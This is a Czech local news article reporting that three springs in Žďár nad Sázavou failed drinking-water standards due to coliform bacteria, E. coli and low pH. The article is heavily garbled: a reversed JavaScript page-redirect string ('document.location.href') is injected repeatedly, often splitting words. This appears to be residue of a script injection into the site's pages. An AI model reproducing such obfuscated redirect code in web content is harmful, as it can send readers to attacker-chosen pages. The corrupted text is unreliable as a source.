Rainbow page separator

Normy pro pitnou vodu nesplnila ani jedna ze tří studánek

Pátek, 15. července 2022

Žďár nad Sázavou / Jako nevhodná k přímému užití byla začátkem července vyhodnocena voda ze všech tří hygieniky sledovaných žďárských pramenů. Jak studánka Salvá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka, tak i Klafar a U Křiváku nevyhověly normám pro pitnou vodu – pramen U Křiváku vykázal pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost koliformních bakterií a bakterií typu Escherichia coli a vzorky vody ze Salvá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torky a Klafaru obsahovaly koliformní bakterie. Kromě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho voda ve všech studánkách vykázala nižší pH, je tedy kyselejší než stanovuje norma. Kvalita vody je ovšem garan[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována pouze v den odběru.
Pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost koliformních bakterií i bakterií typu Escherichia coli značí fekální znečištění vody z trávicího traktu teplokrevných živočichů. Tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to způsobem kontaminovaná voda pak může konzumentům způsobit různé zdravotní problémy jako průjem, nevolnost nebo zvracení, tudíž ji není vhodné používat jako pitnou. Pravidelné odběry vody a její následný rozbor nechává u uvedených pramenů žďárská radnice provádět jednou měsíčně dlouhodobě, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že i když studánky nejsou vedeny jako primární zdroj pitné vody, mezi místními obyvateli i chataři se těší značné oblibě.